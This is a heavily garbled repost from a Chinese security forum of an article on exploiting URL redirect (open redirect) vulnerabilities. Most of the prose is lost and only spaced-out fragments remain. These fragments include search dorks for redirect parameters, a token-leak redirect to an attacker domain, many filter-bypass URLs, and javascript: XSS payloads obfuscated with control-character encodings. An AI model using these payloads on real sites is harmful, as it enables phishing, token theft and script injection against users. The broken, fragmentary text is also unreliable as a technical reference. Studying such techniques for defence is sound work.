[21673] 2021-02-14_URL跳转漏洞的利用技巧

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2021-02-14_URL跳转漏洞的利用技巧 U R L     L e m o n S e c   2 0 2 1 - 0 2 - 1 4 U R L u r l 访 访 u r l e x a m p l e . c o m g o o g l e . c o m 访 访 F a c e b o o k A P P U R L e x a m p l e . c o m F a c e b o o k u r l   F a c e b o o k u r l u r l g o o g l e s i t e : e x a m p l e . c o m 使     h t t p s : / / w w w . e x a m p l e . c o m / ?   g o = h t t p s : / / w w w . g o o g l e . c o m / n u r l : g o i n u r l : r e t u r n i n u r l : r _ u r l i n u r l : r e t u r n U r l i n u r l : r e t u r n U r i i n u r l : l o c a t i o n U r l i n u r l : g o T o
使 u r l u r l     u r l u r l : )   使 u r l / r e d a c t e d . c o m u r l r e t u r n t o = / s u p e r s e c u r e 使 / s u p e r s e c u r e ? t o k e n = 3 9 e 9 3 3 4 a r e t u r n t o = / / m y e v i l s i t e . c o m u r l S S R F   /   R C E 访 t h e i r s i t e . c o m S S R F R C E   j a v a s c r i p t : a l e r t ( 0 )   X S S 3 0 2 J a v a S c r i p t 访 z s e a n o . h t m l 便 h t m l   i n u r l : g o T o i n u r l : r e t u r n _ u r l
X S S J S C S S / H T M L . .   r e d a c t e d . c o m r e t u r n U r l . t h e i r d o m a i n . c o m c d n . t h e i r s i t e . c o m   r e t u r n U r l c d n . t h e i r s i t e . c o m / e g / y o u r f i l e . h t m l     *   使 h t t p s : / / e x a m p l e . c o m / l o g i n ? r e t u r n = h t t p s : / / m y s i t e . c o m / h t t p s : / / e x a m p l e . c o m / l o g i n ? r e t u r n = h t t p s % 3 A % 2 F % 2 F m y s i t e . c o m % 2 F h t t p s : / / e x a m p l e . c o m / l o g i n ? r e t u r n = h t t p s % 3 A % 2 F % 2 F e x a m p l e . c o m % 2 F % 3 F r e t u r n u r l % 3 D % 2 F % 2 F m y s i t e . c o m % 2 F   便 使 / y o u r u r l . c o m / / y o u r u r l . c o m y o u r u r l . c o m / / y o u r u r l . c o m / / t h e i r s i t e @ y o u r s i t e . c o m h t t p s : / / y o u r s i t e ? c = . t h e i r s i t e . c o m / h t t p s : / / y o u r s i t e . c o m # . t h e i r s i t e . c o m / h t t p s : / / y o u r s i t e . c o m . t h e r s i t e . c o m / / / % 2 F / y o u r s i t e . c o m / / / / y o u r s i t e . c o m h t t p s : / / t h e i r s i t e . c o m p u t e r / ( t h e i r s i t e . c o m . c o m p u t e r t l d
h t t p s : / / t h e i r s i t e . c o m . m y s i t e . c o m / % 0 D / y o u r s i t e . c o m % 0 9 ,   % 0 0 ,   % 0 a ,   % 0 7 j a v a % 0 d % 0 a s c r i p t % 0 d % 0 a : a l e r t ( 0 ) ,   j % 0 d % 0 a a v a % 0 d % 0 a a s % 0 d % 0 a c r i p % 0 d % 0 a t % 0 d % 0 a : c o n f i r m   , j a v a % 0 7 s c r i p t : p r o m p t   , j a v a % 0 9 s c r i p % 0 7 t : p r o m p t L e m o n S e c 0 0 0
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则